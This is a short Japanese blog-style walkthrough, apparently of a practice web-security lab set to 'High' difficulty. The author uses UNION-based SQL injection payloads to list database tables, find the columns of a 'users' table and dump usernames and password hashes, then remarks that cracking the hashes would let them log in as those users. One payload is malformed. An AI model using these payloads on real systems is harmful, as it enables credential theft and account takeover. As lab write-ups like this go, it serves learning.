Hey guys!
セキュリティレベルを『High』へ。
サブ画面に『1』を入力すると該当するデータが表示。
しかしながら、『6』を入力すると該当するデータはないみたい。
単にIDは、5つしかないのかもです。
特に個数は関係ないのですが。
寄り道してしまいました。
SQLインジェクションが可能が試してみます。
いけそうなので下記のコードを入力してテーブル名を取得してみます。
1' or 1=1 union select null,table_name from information_schema.tables #
どうやら『users』テーブルがあるようです。
この『users』テーブルのカラム名を下記のコードを入力して取得してみます。
1' or 1=1 union select null,column_name from information_schema.columns=users #
『user』と『password』というカラムが見当たります。
この2つのデータを『users』テーブルから下記のコードを入力して取得してみます。
1' or 1=1 union select user,password from users #
ユーザ名とパスワードが取得できました。
ハッシュ化されたパスワードを複合してパスワードを解析すれば、なりすましてログインできるでしょう。
Best regards,
